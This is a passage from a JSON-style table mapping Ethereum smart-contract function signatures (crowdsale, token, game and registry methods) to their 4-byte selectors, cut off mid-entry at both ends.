"0x6c5ca1fa", "INACTIVITY()": "0x0618c0b0", "releasedSteps()": "0x928432c0", "MIN_BUY_ETHER()": "0xc0d13a6d", "firstRoundCosmosEnd()": "0x3b70cf44", "bountyPaid()": "0xca632cc5", "StatsEthereumRaised()": "0x403bb94e", "maxPurchaseNonWhiteListed()": "0x6d1917b5", "ALLOCATION_LOCK_END_TIMESTAMP()": "0x6b194a4a", "firstRate()": "0x484db63f", "luckyPot()": "0xeb639fd0", "otherPoolTotal()": "0xc6bcefe5", "totalBuyerSupply()": "0xe7579c24", "lastEvidenceCheck()": "0x3d2c8d18", "currentNumberOfUnits()": "0x8975e45f", "ADDR_WITHDRAWAL1()": "0xe339886c", "ethRateMax()": "0x0f391236", "RATE_DAY_0()": "0xba99d1a6", "totalRedeemed()": "0xf35dad40", "exploreCount()": "0x66134794", "priceDivider()": "0x365044a8", "provider1()": "0x2ba7910a", "tokensCreationMin()": "0x331fbc1d", "totalExchange()": "0xb55845e7", "isTransferShipment()": "0xbf7f10fe", "account2()": "0x82f8152c", "TIMEstartICO()": "0x916b5cfa", "compatible20()": "0x5713fcb7", "presaleAddress()": "0x122fe685", "CharityInProgressSupply()": "0xa06285ed", "spiderReq()": "0xc6c65136", "NO_MONSTER()": "0x775e38f7", "rateDecimals()": "0x1a3480b5", "joyTokenContract()": "0x32985244", "crowdsaleBurnAmount()": "0xa1e7e21c", "privateSell2LockEndTime()": "0x7093ab11", "STATE_PAYOUT()": "0xe7843949", "getShareholderArrayLength()": "0xf15bf739", "getPointsToSpend()": "0xec30c4e3", "PRESALE_MAX_ETH()": "0x1350acbd", "nextPromiseId()": "0x90828c78", "Emojicoin()": "0x87c38114", "server()": "0xfd922a42", "burnICOTokens()": "0x54616911", "wolf2Balance()": "0x475d599b", "poolPrice()": "0xabd5f3c7", "ownerPool()": "0x2b65e040", "SecondAddressBalance()": "0xbac127b9", "slots_left()": "0x7cb91d84", "tokenGenerated()": "0x14de9cc2", "exchangeAddress()": "0x9cd01605", "RESERVED_RESERVE_GROUP()": "0x9e0112b8", "BONUS_ICO_PERIOD_TWO()": "0xf6436a7c", "periodICO()": "0xb44eccc9", "promo()": "0xde80b0a5", "fallbackAccount()": "0xd51902cf", "mainSaleSecondEndDate()": "0x2e0fb349", "weiTokensRaised()": "0xf13c8fef", "fundingMinimumTargetInWei()": "0x71ae8f02", "currentHodlerId()": "0x5a75b8d5", "GDCAcc04()": "0x0f9c95da", "periodITO_softCapInUSD()": "0x1617adf7", "milestoneBonus()": "0x9ab060de", "maxCapWei()": "0xf1c4ecb4", "teamAndExpertsTokens()": "0x8e4e0f03", "getTokensForSaleCap()": "0xd8788e68", "creditDaoAddress()": "0x56b09382", "standardSale()": "0xdc1eab83", "given()": "0x132c8641", "votes_against()": "0x359d393d", "PRE_ICO_SLGN_LESS()": "0xd484a285", "getUuidsSize()": "0x5cd45e61", "totalNominees()": "0xfd345fc2", "exchangeRateAgent()": "0xb5481743", "airdropNum()": "0x0b56d4c6", "timeToOpenPresents()": "0x7b87312a", "keyAddress()": "0xdf0b52c8", "GamePoolAddress()": "0xdbed3a30", "teamAdvTokens()": "0xc4815c96", "summDividendReserve()": "0x458fa428", "collectionFunds()": "0x806ee278", "roundThreeTime()": "0x5c044b86", "checkCommitPeriod(bytes32)": "0x6437ab0b", "unlistSubName(bytes32,bytes32)": "0x753d764c", "listSubName(bytes32,bytes32,uint256,uint256,uint256)": "0x639d3e69", "subdomainSale()": "0x3f050f02", "CoinExchangeToken(uint256,string,uint8,string)": "0xf314e2c0", "VitalSkin()": "0xf76e9183", "updateBatches(address,address,uint256)": "0xffb747f0", "getFirstBatch(address,address)": "0xc15e47c4", "getBatch(address,address,uint256)": "0xb4123abb", "unfreeze(address,address)": "0x5adb6ddb", "changeRoot(address)": "0x4a7902d2", "BLING()": "0x1388483d", "finalUnlockTransfer()": "0xcf0cb613", "Coffeecoin(uint256,string,uint8,string)": "0x1a254884", "TwiceAWeekCoin(uint256,string,uint8,string)": "0xb0cee590", "signContract(uint256)": "0x9537e8d1", "addMultipleContracts(bytes32,bytes32,bytes32,bytes32,address[],bytes32)": "0x4d28ca02", "addContract(bytes32,bytes32,bytes32,bytes32,address,bytes32)": "0xc66a431d", "Agreement()": "0x59bc3d47", "TerraFirma()": "0x4a52a5f8", "EthToOwner(address,address,uint256)": "0x8a87aeb9", "getWeiBalance()": "0xb63ed405", "getIsThirdPhase()": "0x216093aa", "getIsSecondPhaseBySoldedTokens()": "0x3390e6c7", "getIsSecondPhaseEndedByTime()": "0xafb390aa", "getRemainingDaysToThirdPhase()": "0x122636b1", "getRemainingDaysToSecondPhase()": "0x1339cba2", "getIsSecondPhaseByTime()": "0x17ce9aae", "getCurrentPhase()": "0xa3a40ea5", "getEthUsdRate()": "0xc8583e69", "setOracleAddress(address)": "0x4c69c00f", "reminderCalc(uint256,uint256)": "0x874f874c", "nfsPoolTransfer(address,uint256)": "0xb349dbdc", "Fibremoney()": "0x93437b52", "Grid(uint256,uint256,uint256)": "0x66ab4e5f", "CeffylToken()": "0xb65a34f5", "ITGCToken()": "0x2a5c2a64", "change_specific_addy(address,uint256)": "0xd587dbf9", "direct_refunds(address[],uint256[])": "0xb991bc14", "add_addys(address[],uint256[])": "0x0bb0e827", "CommunityToken()": "0xc798b5cf", "SnovPresale()": "0x6f6aadfb", "isSaleOver()": "0x59e08fe1", "isSaleOn()": "0x779e170d", "isMaxCapReached()": "0x72841e0c", "centsToTokens(uint256)": "0x994a69d1", "totalSales()": "0x6605ff66", "externalSale(address,uint256,uint256,uint256)": "0x4ec7a6e7", "usdPerEthLogSize()": "0xc7b1fd00", "setUsdPerEth(uint256)": "0xca36695c", "setNotifier(address)": "0xabbb4695", "BsPresale_SNOV(address,address,uint256)": "0xac7dce1d", "ownerCount()": "0x0db02622", "NitroCoins()": "0xddb4897a", "HIBA()": "0xb654bdb0", "FNTCrowdsale(uint256,uint256,uint256,uint256,uint256,uint256,address,uint256,address,address)": "0xea9746a2", "transferFromRegister(address,uint256)": "0xca7230e9", "setQuantity(uint256,uint256)": "0x9405c78f", "startToken()": "0xcd00ee0d", "SYCEarlyPurchase()": "0xa75aef40", "newProject(string,string,uint256)": "0x954db474", "DatPayToken()": "0xcf90bfc9", "createToken(uint256)": "0x2d571cc4", "allocateInternalWallets()": "0x1135b3ac", "PrivatePlacement(address,address,address,address,address)": "0x21be2244", "setMinBuyableAmount(uint256)": "0xd561ef2b", "BaseCrowdsale(address,address,address,uint256,uint256,uint256,uint256)": "0x9bf037e5", "HoQuToken(uint256)": "0x91e2f2c5", "AceFund()": "0x432f3223", "KeplerToken()": "0x8ede3a34", "create(uint256,uint256,uint256,address)": "0x477cdbb5", "getFreeMineral(address)": "0x5d6720b4", "addFreeMineralMulti(address[],uint32[])": "0xc1c7bc68", "addFreeMineral(address,uint32)": "0x9e179b91", "setRecommenderMulti(address[],address[])": "0x1eb92366", "setRecommender(address,address)": "0x639bef41", "DataMining()": "0x5d161310", "CryptoSlotsCrowdsale()": "0xee2e66c7", "Moneda(address,address,address)": "0xe9339de5", "MithrilAxe()": "0x6c2af4e5", "GIDe()": "0xa3df30b4", "Funding(address,uint256)": "0x1af855f8", "ATOToken()": "0x4677b540", "transferTokenContractOwnership(address,address)": "0xcf2f9a4a", "Betsicbo()": "0xe4c487c9", "sendToStocks()": "0x613c36ae", "multiSend(address,address[],uint256[])": "0x9ec68f0f", "PlusPay()": "0x7a55cece", "payoutWinners()": "0x9f7c94aa", "getWinnerDetails(uint256)": "0x4a91e536", "addHero(string,address,address,uint256,uint256)": "0x118a0aae", "getHeroDBZHeroAddress(uint256)": "0x0f7bff76", "getHeroOwner(uint256)": "0x56b4d760", "getHeroCurrentLevel(uint256)": "0xa2cff990", "getHeroCurrentPrice(uint256)": "0x12c89869", "modifyCurrentHeroPrice(uint256,uint256)": "0xb4d657cc", "updateDBZHeroDetails(uint256,string,address,address,uint256)": "0x3238c832", "purchaseHero(uint256)": "0xb7ded7cc", "PHDToken(uint256,string,string)": "0x1d73268a", "StarTravelLane()": "0x0ea227e7", "removeUsers(address[])": "0x2be4a903", "addUsers(address[])": "0x700c9474", "tokenHardcapIssued()": "0xbca19900", "tokenHardcap()": "0x3f242990", "EmissionProvider(address,address,address,uint256,uint256,uint256,uint256)": "0xf8b14500", "_emitDestruction()": "0x26768b83", "_emitHardcapFinishedManually()": "0x61e062a4", "_emitEmission(bytes32,address,uint256)": "0x589dca45", "addLayer(address,uint256,string,string)": "0x0d3c1b45", "getAsset(uint256)": "0xeac8f5b8", "totalAssets()": "0x01e1d114", "setfee(uint256)": "0x73fee090", "refund(address,uint256,address)": "0x4154aede", "init(address,uint256,address,string,string)": "0xa7a62aee", "_getATxToken()": "0xd05c9342", "setServiceController(address)": "0xd5ad3ad0", "DataController(address)": "0x87b9a544", "getSideServices()": "0xe0d872b7", "getBurningMans()": "0xe7b48d98", "getEmissionProviders()": "0xd916ec32", "minted(address,uint256)": "0xb7656808", "removeEmitter(address)": "0x19b3fa4b", "addEmitter(address)": "0x235c279f", "releaseTeamVested()": "0x68ba745c", "founderGrant(address,uint256,uint256,uint256,uint8)": "0x53290d1c", "YouDealToken()": "0x0390d190", "GMQToken(uint256,string,string)": "0x8db517fb", "Abloxx()": "0xeb6157f7", "SecurityChainToken()": "0x80bd2723", "distribute(uint256)": "0x91c05b0b", "getMonths()": "0x9b4f19c6", "calculation()": "0x950da0c8", "mangeWhileList(address,bool)": "0xc3676a02", "initialization(address,address,address)": "0xb4279df3", "WorldSafetySecurityToken()": "0x9305b0f8", "LabtorumToken()": "0x42e6377f", "Talius()": "0xaa4fc0a1", "getExchangeInfo(bytes32)": "0xde6cdd2e", "getExchanges()": "0x1e2e3a6b", "addExchange(bytes32,address)": "0x8fe13b92", "isValidAdapter(address)": "0xccff42b2", "getExchangeAdapter(bytes32)": "0x07930644", "getExchangeDetails()": "0x6601cd77", "setExchangeDetails(bytes32,bytes32)": "0xdda89912", "supportsTradingPair(address,address)": "0x5cd87c71", "supportsTradingPair(address,address,bytes32)": "0x1ddfd7db", "updateInitialBonus(uint256)": "0xe7810318", "DistributeAirdropMultiple(address[],uint256)": "0xf3ccb401", "DistributeAirdrop(address,uint256)": "0x7809231c", "Distribute(address,uint256)": "0xc1d32ad5", "GoldenLightCoin(uint256,string,uint8,string)": "0xf63b1f7c", "setAvailability(bool)": "0x26a18375", "setTermsNumber(uint256)": "0xe249a575", "calculateCommission(uint256,uint256)": "0xd18b07b2", "getCommissions(uint256)": "0x1a88cc31", "setSmartToken(address)": "0x64c176eb", "poolTokenAmount()": "0xd501953d", "setSalesPipeAllowance(address,uint256)": "0x25137f46", "createPipe(uint256,uint256,bytes32)": "0x91e8fc34", "getMaxCap(address,uint256)": "0x969ddd71", "CardsBase()": "0x3814a7a3", "getTotalJadeProduction()": "0xaeaca25e", "tweakDailyDividends(uint256)": "0x6cf49694", "randomJackpot()": "0x3bdfafac", "updateMaxNum(uint32)": "0xe6b96447", "BitcoinFuture()": "0xf4daa98c", "BGGToken()": "0x07aef7a6", "checkSignersByAddress(bytes32,uint256,uint256,uint256)": "0x768f930d", "multiSigDev(bytes32)": "0xb0f72665", "multiSig(bytes32)": "0x1a968069", "getCurrentGasPrice()": "0x11af6564", "getAmountConverted()": "0x453a6e0d", "changeGasPrice(uint256)": "0x655bb565", "addNewUrl(string)": "0x2f20270a", "calculateDiffPercent(uint256,uint256)": "0xc10ce2b0", "seteUSD(address)": "0x75ee549c", "callOracle(address,uint256)": "0x5c30be8e", "calculatedTokens(address,uint256)": "0x30dcf0e8", "changeMax(uint256)": "0x121dbc31", "changeMin(uint256)": "0x3bd0f412", "IPST()": "0x63db3e63", "WeiWeiToken(address,uint256)": "0x242d1259", "transferRecovery(address,address,uint256)": "0x03cd3e47", "checkMyUndistributedBalance(uint256)": "0x2caeb8fc", "getUndistributedBalanceOf(address,uint256)": "0x4fc28f68", "setOpenGroup(uint256)": "0x304a87b7", "changeMaxContribution(address,uint256)": "0x4c9b760d", "reverseSplitTokensAfterDistribution(uint256)": "0xbd0cc4ee", "splitTokensAfterDistribution(uint256)": "0x98313b10", "reverseSplitTokensBeforeDistribution(uint256)": "0x506a0aaa", "splitTokensBeforeDistribution(uint256)": "0xfab8cbe4", "getUnlockedTokens(address)": "0x1f803ac3", "getUnlockedBalanceLimit(address)": "0xc98f0ad9", "distribute(uint256,uint256)": "0x7625391a", "addMemberToGroup(address,uint256)": "0x530e3543", "addMember(address,uint256,uint256,uint256)": "0xb8d9cbbe", "getMembersInGroup(uint256)": "0xdd28d14d", "getHowManyLeftToDistribute(uint256)": "0xb499a26f", "getHowMuchUntilHardCap()": "0x61c2c9c0", "getGroup(uint256)": "0xceb60654", "pack(bytes4,address)": "0x315e3124", "isRegistered(bytes32)": "0x27258b22", "myMethod(uint256,string)": "0x24ee0097", "foo(uint256)": "0x2fbebd38", "revert()": "0x7da3c3ab", "buy(uint256,address)": "0x7deb6025", "fundSchool(uint256)": "0xf746e28d", "LightComplexAirdrop()": "0xf6b70702", "transferMultiDiff(address[],uint256[])": "0xab464fa6", "transferMulti(address[],uint256)": "0x04f016c9", "setUpgradeAgent(address)": "0xd7e7088a", "releaseAgent()": "0xd1f276d3", "canUpgrade()": "0x9738968c", "released()": "0x96132521", "transferAgents(address)": "0x867c2857", "getUpgradeState()": "0x8444b391", "releaseTokenTransfer()": "0x5f412d4f", "setTokenInformation(string,string)": "0x4eee966f", "setMintAgent(int256,address,bool)": "0xc0938c1a", "mintAgents(int256,address)": "0xc93b9755", "setReleaseAgent(address)": "0x29ff4f53", "mintingFinished()": "0x05d2035b", "setTransferAgent(address,bool)": "0x02f652a3", "init(uint256,address,address)": "0x4557b4bb", "MithrilToken()": "0x3c0093a6", "ERC20Token()": "0x7a80760e", "rate(uint16,uint256)": "0x23c2460d", "returnBox()": "0x1c9a5ddf", "isUserAuthorized(address)": "0x894e5f2d", "smalobox()": "0xfd4b9d4d", "aiGFJ()": "0xabcdabcd", "gyCF()": "0x90ae6863", "gvCF()": "0x120184fa", "yycU4()": "0xaaaaaad1", "uYZeB()": "0xaaaaaad1", "isClean(string)": "0x37db0703", "assignAll()": "0x90ae631d", "totalEntrants()": "0x694463a2", "maxEntrants()": "0x60643652", "enter(bytes32,bytes8)": "0x124c32a1", "changeOwner(address,address,address)": "0xf11c2cec", "setFunctionAuthorized(address,string,bytes32)": "0x99df3d7a", "pause(address)": "0x76a67a51", "database()": "0x713b563f", "unpause(address)": "0x57b001f9", "CONFIG_RETURN()": "0xfdff85b4", "CONFIG_MAX_PLAYERS()": "0xf963aac6", "end()": "0xefbe1c1c", "CONFIG_FEES()": "0x4c6686d8", "CONFIG_MIN_PLAYERS()": "0x358c24b1", "CONFIG_DURATION()": "0x348a653a", "numplayers()": "0x2d5ea8e3", "round()": "0x146ca531", "numtickets()": "0x1226afde", "CONFIG_PRICE()": "0xd77bf0cf", "CONFIG_FEES_DIV()": "0xc2314be4", "tkwins()": "0xbda5ea03", "CONFIG_MAX_TICKETS()": "0x8bef5222", "CONFIG_MIN_VALUE()": "0x757007f6", "CONFIG_FEES_MUL()": "0x656ca11d", "txs()": "0x4fb30d8b", "turnover()": "0x256540cd", "tklosses()": "0x22e37189", "tktotal()": "0x20514abf", "CONFIG_MAX_VALUE()": "0x090015d8", "canTransfer(address)": "0x78fc3cb3", "lockAddress(address,bool)": "0xf2260031", "nextCapTime()": "0xece2ea40", "whitelistContract()": "0x84900b04", "addressChangeBlock(address)": "0x44cf262a", "contributionCaps(uint256)": "0x732c227f", "nextContributionCaps(uint256)": "0x4a5df250", "maxGasPrice()": "0x3de39c11", "contributionMin()": "0xbcc13d1d", "feePct()": "0xa02cf937", "activeToken()": "0x8796d43d", "maxContractBalance()": "0x65fcb49e", "ethRefundAmount(uint256)": "0x52f1e07b", "finalBalance()": "0x2129e25a", "receiverAddress()": "0x16fed3e2", "contractStage()": "0x0370ca41", "maxPoolTotal()": "0xf3cc2436", "transferMyTokens()": "0xf2316472", "modifyWhitelist(address[],address[])": "0xdef86cbb", "failures(uint256)": "0xbf4d5af4", "minContribution()": "0xaaffadf3", "setContributionSettings(uint256,uint256,uint256)": "0xa8083b74", "maxContribution()": "0x8d3d6576", "poolTotal()": "0x704d4db0", "whitelistAll()": "0x5d54e612", "transferAllTokens()": "0x4c96f0cc", "getParticipantBalances()": "0x390a05a8", "participants(uint256)": "0x35c1d349", "refundPresale()": "0x26bdd814", "payToPresale(address)": "0x1fff2d8a", "removeWhitelist()": "0x17f708fb", "getTotalBid(address,uint256)": "0xf27eede0", "getBestBid(uint256)": "0xf14e96f1", "setFeedAddress(address)": "0xc6ceafef", "getMinAllowedBid(uint256)": "0xc1d357bc", "setDestinationMultisigWallet(address)": "0xf118f7d6", "internalSetDestinationMultisigWallet(address)": "0x84e2341d", "internalSuccessOver()": "0xae9074ff", "internalEnableRefunds()": "0x7fda8d52", "internalRefund(address,uint256)": "0x2eb73307", "internalDeposit(address,uint256)": "0x89d4a66c", "internalInvest(address,uint256,uint256)": "0xf23a8155", "internalAssignTokens(address,uint256,uint256,uint256,uint256)": "0xcd58a867", "getWeiInCents(uint256)": "0x06240d7d", "getOneTokenInWei()": "0xfa1896f4", "mintTokensForSecondStage()": "0xd8085306", "mintTokensForFirstStage()": "0x509065b8", "AllocatedCappedCrowdsale(uint256,address,address,uint256,uint256,uint256,uint256,address,address,address,address,uint256)": "0xe34639cb", "countUp()": "0x0bd8599e", "addToMemeList(string)": "0xeff5c266", "setCut(uint16)": "0x7bb8c4e5", "BaldcoinCore(string,string,uint8,uint64,uint64,uint16,uint256,address[])": "0x3788e371", "HuandeToken(uint256,string,uint8,string)": "0x9b322b7e", "Aaa()": "0xdad7e4d2", "KeyTokenSale(uint256,address)": "0xb50eb5d7", "YUPToken(address,address,address,address,address)": "0xfb890a17", "POEXToken(address,address)": "0x250a93cb", "BSDB()": "0x1ab961a1", "DinosaurFarmer()": "0x19996d50", "tokensToCounter(uint256)": "0x334ef43d", "counterToTokens(uint256)": "0x6b01acf5", "calculateCounterReceived(uint256)": "0x8fe60df1", "totalDestinationBalance()": "0xee6c5a8b", "transferWithDividends(address,uint256)": "0x62850233", "changeSymbol(bytes32)": "0x1ad8fde6", "DivvyUp(bytes32,bytes32,uint8,uint8,uint256,uint256,uint256,address)": "0x872d637f", "purchaseTokensERC20(uint256)": "0x9fd1e7f6", "admin_deposit(int256,int256)": "0xea4b466b", "get_orderAddress(address,address,uint256,uint256,uint256)": "0x645c4625", "balanceOfLotteryNum(address)": "0xb8406a7e", "updateUser(bytes32)": "0x7faff876", "updateMessage(uint256,bytes32)": "0x491fd263", "createMessage(bytes32)": "0x75a73ed3", "messagesLength()": "0xe11dba54", "addHash(string)": "0xaeb27602", "LooisToken(uint256,string,uint8,string)": "0x256c5fc6", "Alecrypto()": "0x71cc4f35", "moveUnsoldTokensToICO()": "0x086af728", "changeICODates(uint256,uint256,uint256)": "0x37a14b52", "getGameInfoByIndex(uint256)": "0xfb9dd851", "newGame(uint256,bytes8,uint256,uint256,string)": "0x213ae9ec", "Bet4Land()": "0x15d3f614", "GamityToken()": "0x0b4b5d5e", "recycleUnreceivedBonus(address,address)": "0x2f1ee5e1", "calculationTotalSupply()": "0x500b6b3e", "calculateBonusToken(uint8,uint256)": "0x5c6bd930", "receiveBonus()": "0x30507451", "tryNextTimeRange()": "0xb3a61c80", "bonus(address,address)": "0xedd637d0", "getWeiBalance(address,address)": "0x527aea0a", "addWei(address,address,uint256)": "0xb5c1662f", "Lover()": "0x1c27f30b", "GRAChain(uint256,string,string,string)": "0x14f7789d", "BlockchainFUN(uint256,string,string)": "0x0194ac16", "AIChain(uint256,string,string)": "0xbd9ca422", "DataFromSetting(uint8)": "0xe443253a", "DataToSetting(uint8,bool,uint8)": "0x91ad48a1", "DoFee(uint256)": "0x1c465538", "rand(uint256,address)": "0x2d97fc5d", "ProcessGame(address,address,bool,uint256)": "0xe9c1a9c4", "PlaySimpleGame(uint8,bool)": "0x41b3203c", "GetSetting(uint8,uint8)": "0x5af14603", "CancelSimpleOffer(uint256)": "0x249f77ef", "CancelSimpleOffer_internal(uint256,bool)": "0x87d3525f", "OfferPlay(address,uint8,uint8)": "0xd9a569f5", "OfferCancel_internal(uint8,bool)": "0xd8dbb712", "OfferCancel(uint8)": "0x9c71d169", "CreateOffer_internal(uint8,bool)": "0x72e4f5cc", "CreateOffer(uint8)": "0xbad7d46a", "ViewOffer(address,uint8)": "0x1f1144dc", "UserOffers(address)": "0xb725e556", "EtherWild()": "0x9b5b4019", "mintNewDrawings(uint256)": "0x854642e1", "flipSwitchTo(bool)": "0x07156854", "newCollectible(uint256,string,uint256,uint256,uint256,int256,string,uint256,string)": "0x019c3f52", "makeCollectibleUnavailableToSale(address,uint256,uint256,int256,uint256)": "0x958c4be7", "transfer(address,uint256,uint256,int256)": "0xe995194f", "acceptBidForCollectible(uint256,uint256,uint256,int256)": "0xb8c92537", "offerCollectibleForSaleToAddress(uint256,uint256,int256,uint256,address)": "0xfb274654", "withdrawOfferForCollectible(uint256,uint256,int256)": "0x57f2c6b7", "offerCollectibleForSale(uint256,uint256,int256,uint256)": "0x253f2809", "withdrawBidForCollectible(uint256,uint256,int256)": "0xdd9555f1", "enterBidForCollectible(uint256,uint256,int256)": "0x767c732e", "alt_buyCollectible(uint256,uint256,int256)": "0xc78dc603", "buyCollectible(uint256,uint256,int256)": "0x9d77f85a", "DadaCollectible()": "0x8775a557", "ETLToken()": "0xfbd59425", "getTotalSent()": "0x518d3b64", "DisableSelling()": "0xa80acfd3", "EnableSelling(uint256)": "0x244cb924", "JAJToken()": "0xb9635685", "JOLDEAME()": "0xd55108be", "amountOfTokens()": "0x13c52111", "extractRepository(string)": "0x2f75a929", "allow(bytes32,string,address,bool)": "0x8316394e", "getActiveBusinessesPerType(uint256)": "0xcf25e4e8", "getCityPendingBuildings(uint256,uint256)": "0x8106d57a", "getCityActiveBuildings(uint256,uint256)": "0x2d10d4d1", "getCountBuildings(uint256,uint256,bool)": "0x0b9f2ca6", "getCountAllBuildings(uint256,bool)": "0xe94d7af6", "getCityPopulation(uint256)": "0xb28241f9", "getCountSenderCities(address)": "0x17c63141", "getSenderCities(address)": "0xba87fdd4", "getCountSenderLands(address)": "0x6391d3b2", "getSenderLands(address)": "0x991257a2", "getCityBuildings(uint256,bool)": "0x03b718ee", "getTransaction(uint256)": "0x33ea3dc8", "getBuilding(uint256)": "0x9dfd8b02", "getBusiness(uint256)": "0x4d7439cb", "getLand(uint256)": "0xf02dd53f", "Fcoin()": "0xf02fff9d", "OEO(uint256,string,string)": "0xd609fe59", "YourToken()": "0x0b009517", "setlockBalance(address,uint256)": "0x93aababc", "setModel(address,uint256)": "0x3b903521", "DreamToken()": "0x4977d6a4", "unPauseTransfers()": "0x710d6a61", "STTR(uint256,string,uint8,string,address,address)": "0x6cee2d45", "Poppy()": "0x0222f96e", "setExchangeRegulatorWallet(address)": "0xd23ef360", "setAmountToken(uint256)": "0x9060091c", "PresaleMidexToken()": "0xbba8b342", "refundAdveriser(uint256)": "0x6d0f8806", "chargeAdvertiser(address,uint256,uint256,address)": "0x566dd702", "setCurs(uint8)": "0x0c7eca6e", "FruoCoinBETA()": "0xa427ee36", "get_deployed_forwarders()": "0x9bf97bd9", "create_forwarder()": "0x25ccf381", "DANKSIGNALS()": "0x7cbe9e41", "CasCoin()": "0x5ebc7826", "batch(address[],uint256[])": "0xc00c4e9e", "finishFunding()": "0xebae46be", "RtBCoin()": "0x20c5478f", "DistributeButtonIncome()": "0x20729b83", "ButtonClicked(address)": "0xb0c9fec7", "GetWinners()": "0xd214326f", "GetWinnerAt(uint256)": "0x5f27e47d", "GetPlayerDataAt(address)": "0xe637f824", "GetPlayerAt(uint256)": "0xeab8d67b", "GetClickPrice()": "0x08b4fa40", "GetExpireTime()": "0x6f4dfede", "GetTotalPot()": "0x749be0c0", "GetTotalClicks()": "0xfdb837e8", "GetTotalPlayers()": "0x409b479c", "ETHButton()": "0x752dd635", "Matrexcoin(uint256,string,uint8,string)": "0x0fd9d5bf", "getBuyArray(address)": "0xe5d3d9d7", "getBuyCount(address)": "0xd489c0bf", "getPetCanPresellCount()": "0x821919fd", "petPresell(uint16)": "0x06b16a6c", "setWarTokenAddr(address)": "0x72c691b2", "ActionPresell(address)": "0xaccf878a", "setMigrationTarget(address)": "0xc231bace", "transferAllowance(address,address,uint256)": "0xcbd2ecd2", "_changeTrancheIfNeeded()": "0x72fc75d7", "setDeveloperStatus(address,address,bool)": "0x81ebd8de", "updatePlayerRewards(address,address)": "0xfd338726", "adjustTranche(uint256)": "0xdf23128f", "adjustNextTranche(uint8,uint8)": "0x0d3ade73", "adjustWithdrawRate(uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32)": "0x6433ef42", "adjustReward(uint256)": "0x716d3c6c", "setEthRate(uint16)": "0x84533794", "Quarters(address,uint256)": "0x2cd9e233", "changeWhitelist(bool)": "0x97bdc7c8", "changeRestrictedtStatus(address,address,bool)": "0x9d58aa41", "changeWhitelistStatus(address,address,bool)": "0x80b8e6d1", "startStage(uint256,uint256,uint256,uint256)": "0xde80344d", "Q2(address)": "0x54217c21", "withdrawRoyalty()": "0xf1147bae", "RoyaltysOwing(address)": "0xd78506ce", "migrateFrom(address,uint256,uint256,uint256,bool)": "0x90dd027e", "VormaToken()": "0xb09938b8", "OZENToken(uint256)": "0xb2a68466", "getExpiration(uint256,uint256)": "0x0b14331f", "setPrice(uint256,uint256[],uint256[])": "0xa243b6c1", "registration(bytes32,uint256,address)": "0xdfef58a6", "renewSubscriptionByDays(uint256,uint256,uint256)": "0x7462beec", "CryptomniumChain()": "0x5bf85c28", "HMTCrowdsale(address,uint256,uint256,uint256,address,address)": "0x983086df", "changeWhitelistedContract(address)": "0xedc42b2d", "VERIME(address)": "0xc8bd1d13", "BotCoin()": "0x97537bdf", "DappToken()": "0x6f75cd14", "MensariiCoin()": "0x63ccedfe", "TKT(address)": "0x1595f207", "replaceToken(address)": "0xcd9063f6", "CryptoTicketsICO(address,address,address,address,address,address,address,address,address,address)": "0x9824cec8", "tokenPCT(string,string,uint8)": "0x1c08366b", "LTBToken()": "0xc4b5f891", "SIGToken(uint256)": "0x03487513", "HngCoinSale(uint256,string,string)": "0x16772492", "coinsUnit(uint256)": "0x659a9cbc", "salesAddress(address)": "0x1bf57f41", "sendit(address,uint256)": "0x3a6ddf70", "HngCoin(uint256,string,string)": "0xa27c3a2d", "getMetadataHistoryLength(string)": "0x9db028ab", "getCreatorMetadata(string)": "0x7303a559", "getTokenCreationTime(string)": "0x3f590062", "mint(string,string)": "0x8aa0fdad", "hashExists(string)": "0x9871e510", "VDN(uint256,string,uint8,string)": "0x17367bc8", "getCustomerTxPaymentMCW(address,bytes32)": "0xa0e6a44b", "isValidCustomerTxPaymentForKWh(address,bytes32)": "0x712aa191", "isSpentCustomerTxPaymentForMCW(address,bytes32)": "0x26d3ed0a", "isValidCustomerTxPaymentForMCW(address,bytes32)": "0xcac952ae", "getCustomerTxTimestampPaymentKWh(address,bytes32)": "0xc3c6f0c9", "getCustomerTxPaymentKWh(address,bytes32)": "0xfaadb14a", "getCustomerTxTimestampPaymentMCW(address,bytes32)": "0x23a90e5e", "getCustomerTxAmountKWh(address,bytes32)": "0x4569db8a", "getCustomerTxAmountMCW(address,bytes32)": "0x24453ed6", "getCustomerTxAtIndex(address,uint256)": "0x6001b23e", "getCustomerTxCount(address)": "0xa14977d5", "isValidCustomer(address)": "0x78166097", "getCustomerTxRegistry(address)": "0x9830a8fd", "getCustomerAtIndex(uint256)": "0x97fb2cea", "getCustomerCount()": "0x2027d746", "setCustomerTxAsSpent(address,bytes32)": "0x2e97f1bb", "addTxToCustomerRegistry(address,uint256,uint256)": "0x3f751ad0", "addCustomerToRegistry(address)": "0x7666ee8f", "getTxPaymentMCW(bytes32)": "0x5af9f68f", "isValidTxPaymentForKWh(bytes32)": "0xdd02e30d", "isSpentTxPaymentForMCW(bytes32)": "0xf79a97fc", "isValidTxPaymentForMCW(bytes32)": "0xf22c0f7d", "getTxTimestampPaymentKWh(bytes32)": "0x517e62ab", "getTxPaymentKWh(bytes32)": "0xff56b65a", "getTxTimestampPaymentMCW(bytes32)": "0x675c3048", "getTxAmountKWh(bytes32)": "0x9d11f09f", "getTxAmountMCW(bytes32)": "0xdc1bba17", "getTxAtIndex(uint256)": "0xb167c34e", "getTxCount()": "0x1dd46c1e", "setTxAsSpent(bytes32,bytes32,uint256)": "0xda79a9fc", "addTxToRegistry(bytes32,uint256,uint256,uint256)": "0x1720ce1f", "FANBASE()": "0xdf9b2931", "LianBaoCoin()": "0x95535569", "EDN()": "0x2e94afe0", "PDTToken()": "0xc1b0561d", "getLockBalance(address,uint8)": "0x0613c265", "XIAOZHI4()": "0xf0ce6231", "InvestorsToken()": "0x308e25ac", "changeTakeoutWallet(address)": "0xb0ed9774", "eventPirze(address,uint8)": "0xb94f5a6e", "WhoIsTheContractMaster()": "0x76637dcd", "setBoardMember(uint256,uint256,uint256,uint256)": "0x8dee53b9", "getVipInfo(uint256)": "0x4d65beb1", "deleteVip(uint256)": "0x8d72f856", "mineSalary(uint256)": "0x876f9795", "createVip(address,uint256,uint256,uint256)": "0xcdfe2815", "getPosterInfo(uint256,uint256)": "0xa61d6829", "getPartnerInfo(uint256)": "0x5538c964", "setPartnerDurance(uint256,uint256)": "0x4ea611cd", "setPartnerPool(uint256,uint256)": "0x6509c195", "partnerTransfer(uint256,bytes32,address,uint256)": "0xfc04c0c4", "createPartner(address,uint256,uint256,uint256)": "0x20db91e2", "_medalUnFreeze(uint256)": "0x730a1a16", 